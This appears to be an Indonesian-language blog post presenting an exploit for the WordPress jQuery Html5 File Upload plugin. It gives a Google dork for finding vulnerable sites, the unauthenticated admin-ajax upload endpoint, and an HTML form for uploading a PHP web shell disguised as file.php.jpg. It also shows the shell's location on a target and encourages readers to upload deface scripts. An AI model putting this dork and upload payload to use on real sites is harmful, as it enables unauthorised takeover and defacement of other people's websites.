Wordpress Plugins jQuery Html5 File Upload Vulnerability


#################################################################################
# Wordpress Plugins jQuery Html5 File Upload Vulnerability | CSRF
# Author : Akbar Dravinky
# Google Dork: inurl:/wp-content/plugins/jquery-html5-file-upload/
# Tested on: Win 7, Linux
# 
#################################################################################


# [!] Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=load_ajax_function

# [!] File Location : http://127.0.0.1/wp-content/uploads/files/guest/file.php.jpg

pertama² cara dlu target menggunakan dork diatas
ciri ciri vuln :
tinggal kalian pergi ke csrf 
uploadshell extensi  file.php.jpg

#[*] CSRF:
#################################################################################
<html>
<body>
<form method="POST" action="http://127.0.0.1/wp-admin/admin-ajax.php?action=load_ajax_function"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
</body>
</html>
#################################################################################
nah coba liat gambar diatas ,shell saya uda ke upload gan tinggal ngaksesnya 
contoh :

http://target.co.li/wp-content/uploads/files/guest/file.php.jpg

nah kan uda ke upload gampang kan
tinggal upload sc pepes klian :v
terima kasih >_<

0 Response to "Wordpress Plugins jQuery Html5 File Upload Vulnerability "

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel